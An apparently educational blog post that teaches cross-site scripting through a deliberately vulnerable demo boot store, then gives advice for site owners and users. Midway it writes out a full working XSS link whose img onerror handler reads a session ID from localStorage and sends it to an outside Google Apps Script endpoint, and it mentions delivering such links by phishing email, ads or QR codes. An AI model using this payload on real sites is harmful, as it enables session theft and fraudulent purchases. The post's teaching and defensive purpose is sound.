When criminals try to attack us, whether as employees of a company, or directly as targets in our personal lives, they want our money. At least, in 9 out of 10 times, they are after the money. We have been told to avoid clicking suspicious links. Did you get an email telling you that you won the lottery? Don’t click! Did you get a promotion notice by email – but not from your boss’ normal email but from a Gmail account? Don’t click!

In most cases clicking that link will not automatically empty your bank account. When they attack, most of the time they try to trick you to go to a fake login page controlled by them, so that they can steal your password when you try to log in. The other typical approach they take, is to ask you to open an attachment and accept any security warnings – so that they can install malware on your computer. But if you don’t give them your password or open those attachments – can they still win? Sometimes they can, if they find vulnerabilities in the software you use, that they can exploit.

This is why tech companies are always urging you to update your computer. But what if the software is not on you computer, but a web page? Then it will be difficult for you to update it. In fact, impossible. You have to hope that the owner of the webpage has done that job for you, to keep you and everyone else using the web page safe. But what if they didn’t do that? Can hackers scam you just by making you click a link? Sometimes they can!

The path to getting hacked is sometimes very short

Getting your boots for free

Now you are going to be the hacker. You have been snooping around the Internet, and you managed to find a perfect target. An online store with a vulnerability that will let you scam its customers just by clicking a link. Customers of the store can save their payment data, and when they are logged in, a single click is enough to make the order. All you need to do to allow yourself som free shopping, is to send them the right link. Or from their point of view; you can steal their money by making them click the wrong link. No attachments or passwords needed.

Of course, hacking a real online store and its customers would be unethical, and illegal. We don’t want you to go to jail, so we have created a fake store with the required vulnerability, as well as a fake customer that you can scam. So you get to try the bad side without risking going to jail. Of course, you won’t get any loot to sell on eBay either. The store we created supposedly sells the best boots on the Internet: https://donutshop.glitch.me.

It has a pretty useless search – it isn’t able to find anything. But the programmers have been lazy, so they are not checking what you are searching for. And they return it directly to the browser again. To make it possible to save searches, they have also created a way to search through the address bar but this is not visible on the page. It is a feature under development, but since you are such a great hacker, you have found their secret trick.

Search parameters can be dangerous

For example, going to https://donutshop.glitch.me/en#search/donkey will search for donkeys in the store. It seems they are not selling donkeys. That is not a problem. But returning whatever someone types into the address bar directly in the web page is dangerous! A hacker can write code that the web page will execute when a user clicks a link with a search phrase like that. And now you can create a link for someone to click that will allow you to break into their account – and they have no way of knowing that this is happening!

Good hackers need somewhere to store stolen data. Since time is money you have outsourced this job, and someone from Fiverr provided you with a URL to use for stealing the data. Using a special URL saves the data in spreadsheet that is published online. You can view all the hacked user ID’s here: Hacked Accounts Sheet.

Creating the dangerous link

Now to the hacking part. The vulnerability on the page is a very common type known as cross-site scripting, or XSS. We can write code in JavaScript that will run when our victim clicks the link to go to the boot store.

Our victim needs to be logged in to the boot store for our trick to work. When they log in, this store saves a long string of letters and numbers in the user’s browser. This could be a cookie, but this time it is using a storage function called “localstorage”.

This is good for you as a hacker, because it is easier for web pages to protect information stored in cookies. You find out that if you can steal the data named “userid” in localstorage, you can impersonate your victim and order boots. This means that you can use their stored credit card to pay! After an hour on Google and YouTube, and discussing in a group on Facebook, you have managed to put together the right link.

https://donutshop.glitch.me/en#search/a>'>"<img src="x" onerror='fetch(`https:%2F%2Fscript.google.com%2Fmacros%2Fs%2FAKfycbz6sbeXT2autcQJ3X3WftzyxPuQ6jq6MPnsz7yIAg07f8Ge7UY6Uz-XyN9Ekduwngfx%2Fexec?userid=${localStorage.getItem("userid")}%26username=${localStorage.getItem("brukernavn")}%26hackedby=evildonkey`, {"mode": "no-cors"})'>

This looks complicated but it consists first of the search string, that allows us to place a search into the page. Beceause the programmers have not protected against bad input, we can write HTML and JavaScript here. We choose to search for <img src=”x” onerror=”evil-code-here”>. This tries to insert a picture into the web page. The browser will look for a picture at the URL (internet address) specified in “src” Of course, “x”, does not exist. This leads to an error. The “onerror” thing is the code that will be executed by the browser when there is an error. The code we give it is to steal the user ID and the username from localstorage, and send it to the spreadsheet prepared for us by the Fiverr hacker.

Phishing for free boots with a single click

All we need to do to shop for free, is to get a logged in user to click our little magic link. We could for example target people in phishing emails with a nice offer from this store, we could run our own pay-per-click ads pointing to this magic link, or we could even create post cards with QR codes on them. Finally, when we have stolen that precious user ID, we simply add it to the localstorage in our own browser, and we can shop for free!

How to protect against 1-click hacks like this?

Of course, if all the hacker needs to do to trick you is to make you click a link, game over can happen pretty quickly. The demo we made here was possible because of a vulnerability known as cross-site scripting. Website owners can protect users from being hacked like this by following good practice for web development. The OWASP Top 10 list is a good place to start!

What can you do as a user then, to avoid getting hacked? First of all, being careful with links people send to you is a good start. If that link is very long and contains a lot of weird characters, there is reason to be skeptical. But sometimes our attention will slip.

Another good idea is to avoid storing payment data if that means someone can order simply by taking over your account. If a purchase has to be confirmed for example using a token generator from your bank, you are much safer. It is also a good idea to use a credit card instead of a debit card for online purchases, and to review the credit card statements closely every month to avoid overlooking unexpected transactions.

Leave a Reply